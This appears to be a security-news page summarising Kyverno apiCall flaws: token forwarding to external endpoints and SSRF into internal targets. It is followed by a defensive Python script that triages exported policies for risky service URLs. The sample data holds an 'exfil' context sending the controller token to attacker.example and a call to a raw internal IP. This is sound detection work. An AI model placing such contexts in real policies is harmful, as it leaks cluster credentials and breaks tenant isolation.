The Lab · 2026-04-24 03:54:06 · GitHub Issues
A high-severity vulnerability in Kyverno's policy engine allows ServiceAccount tokens to be automatically forwarded to external endpoints without policy authors' knowledge or consent. The flaw, tracked as GHSA-8wfp-579w-6r25, stems from an insecure-by-default behavior in Kyverno's apiCall service mode, where the admiss...
The Lab · 2026-04-24 03:54:07 · GitHub Issues
A high-severity vulnerability in Kyverno, tracked as CVE-2026-40868, allows policy-controlled manipulation to redirect the Kubernetes controller service account token to attacker-controlled endpoints, enabling a classic confused deputy attack. The flaw exists in the apiCall servicecall helper, which implicitly injects ...
The Lab · 2026-04-24 03:54:08 · GitHub Issues
A critical Server-Side Request Forgery (SSRF) vulnerability in Kyverno's APICall feature allows users with Policy creation permissions to pivot from low-privilege namespace access into high-value internal targets, effectively dismantling tenant isolation in shared Kubernetes clusters. Tracked as GHSA-fmqp-4wfc-w3v7 and...
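All three entries above turn on the same design point: a Kyverno apiCall context in service mode sends the Kyverno controller's ServiceAccount token to whatever URL the policy names, so anyone who can create a Policy or ClusterPolicy chooses where that token goes. The script below is an added example, not code from Kyverno or from any of the advisories listed here. It triages policies exported with `kubectl get clusterpolicies,policies -A -o json`, reports every apiCall that has a `service.url`, and rates the destination: external hosts and raw IP addresses (the token leaves the cluster, or the call reaches an internal target), in-cluster services in namespaces the platform team has not reviewed, and services in reviewed namespaces. The policy objects and hostnames are constructed for illustration, and the walk assumes Kyverno's `context[].apiCall.service.url` layout; `urlPath`-only calls, which go to the API server, are deliberately not flagged.

```python
"""Triage Kyverno policies for apiCall service-mode contexts (added example)."""
import json
from urllib.parse import urlsplit

# Kubernetes cluster-local DNS suffixes; hosts outside these are treated as external.
CLUSTER_SUFFIXES = (".svc", ".svc.cluster.local")

SEVERITY = {
    "external": "high",               # controller SA token leaves the cluster
    "ip-literal": "high",             # raw address: likely an SSRF target, not a named service
    "in-cluster-unreviewed": "medium",  # a tenant namespace could run the receiving service
    "in-cluster-allowed": "info",
}


def classify_url(url, allowed_namespaces):
    """Return (category, namespace) for an apiCall service URL."""
    host = (urlsplit(url).hostname or "").lower()
    if not host:
        return "external", None
    if host.replace(".", "").isdigit() or ":" in host:   # IPv4 dotted quad or IPv6
        return "ip-literal", None
    for suffix in CLUSTER_SUFFIXES:
        if host.endswith(suffix):
            parts = host[: -len(suffix)].split(".")      # expect <service>.<namespace>
            if len(parts) == 2:
                ns = parts[1]
                cat = "in-cluster-allowed" if ns in allowed_namespaces else "in-cluster-unreviewed"
                return cat, ns
            return "in-cluster-unreviewed", None
    return "external", None


def iter_service_apicalls(node):
    """Yield (context_name, url) for every apiCall carrying a service block.

    Walks the whole spec instead of fixed paths, because Kyverno accepts
    context entries both at rule level and inside mutate/validate foreach blocks.
    """
    if isinstance(node, dict):
        api = node.get("apiCall")
        if isinstance(api, dict):
            svc = api.get("service")
            if isinstance(svc, dict) and "url" in svc:
                yield node.get("name", "<unnamed>"), svc["url"]
        for value in node.values():
            yield from iter_service_apicalls(value)
    elif isinstance(node, list):
        for value in node:
            yield from iter_service_apicalls(value)


def triage_policies(policy_list, allowed_namespaces=("kyverno",)):
    """Return findings for a kubectl JSON list, highest severity first."""
    findings = []
    for item in policy_list.get("items", []):
        meta = item.get("metadata", {})
        policy = f"{meta.get('namespace', 'cluster')}/{meta.get('name')}"
        for ctx_name, url in iter_service_apicalls(item.get("spec", {})):
            category, _ns = classify_url(url, allowed_namespaces)
            findings.append({"policy": policy, "context": ctx_name, "url": url,
                             "category": category, "severity": SEVERITY[category]})
    order = {"high": 0, "medium": 1, "info": 2}
    findings.sort(key=lambda f: order[f["severity"]])   # stable: keeps discovery order within a tier
    return findings


# Constructed sample in the shape of `kubectl get clusterpolicies,policies -A -o json`.
SAMPLE_POLICIES = json.loads("""
{ "items": [
  {"kind":"ClusterPolicy","metadata":{"name":"verify-images"},
   "spec":{"rules":[{"name":"check","context":[
      {"name":"attest","apiCall":{"method":"POST",
         "service":{"url":"https://attestor.platform.svc:8443/verify"},"jmesPath":"status"}}]}]}},
  {"kind":"Policy","metadata":{"name":"tenant-hook","namespace":"tenant-a"},
   "spec":{"rules":[{"name":"label","mutate":{"foreach":[{"list":"request.object.spec.containers",
      "context":[{"name":"svc","apiCall":{"service":{"url":"http://collector.tenant-a.svc/ingest"}}}]}]}}]}},
  {"kind":"ClusterPolicy","metadata":{"name":"audit-pods"},
   "spec":{"rules":[{"name":"audit","context":[
      {"name":"nsinfo","apiCall":{"urlPath":"/api/v1/namespaces/{{request.namespace}}"}},
      {"name":"exfil","apiCall":{"service":{"url":"https://attacker.example/hook"}}},
      {"name":"internal","apiCall":{"service":{"url":"http://10.0.12.7:9200/_cat/indices"}}}]}]}}
]}
""")

if __name__ == "__main__":
    for f in triage_policies(SAMPLE_POLICIES, allowed_namespaces=("platform",)):
        print(f"[{f['severity']:6}] {f['policy']} ctx={f['context']} -> {f['url']} ({f['category']})")
```

Run it against a real export by replacing `SAMPLE_POLICIES` with `json.load(open("policies.json"))`; on the sample it reports the `attacker.example` and raw-IP calls as high, the tenant-a service as medium (a tenant can stand up whatever listens at that name), and the platform attestor as informational. The `nsinfo` context is not reported because it uses `urlPath` and therefore talks only to the API server.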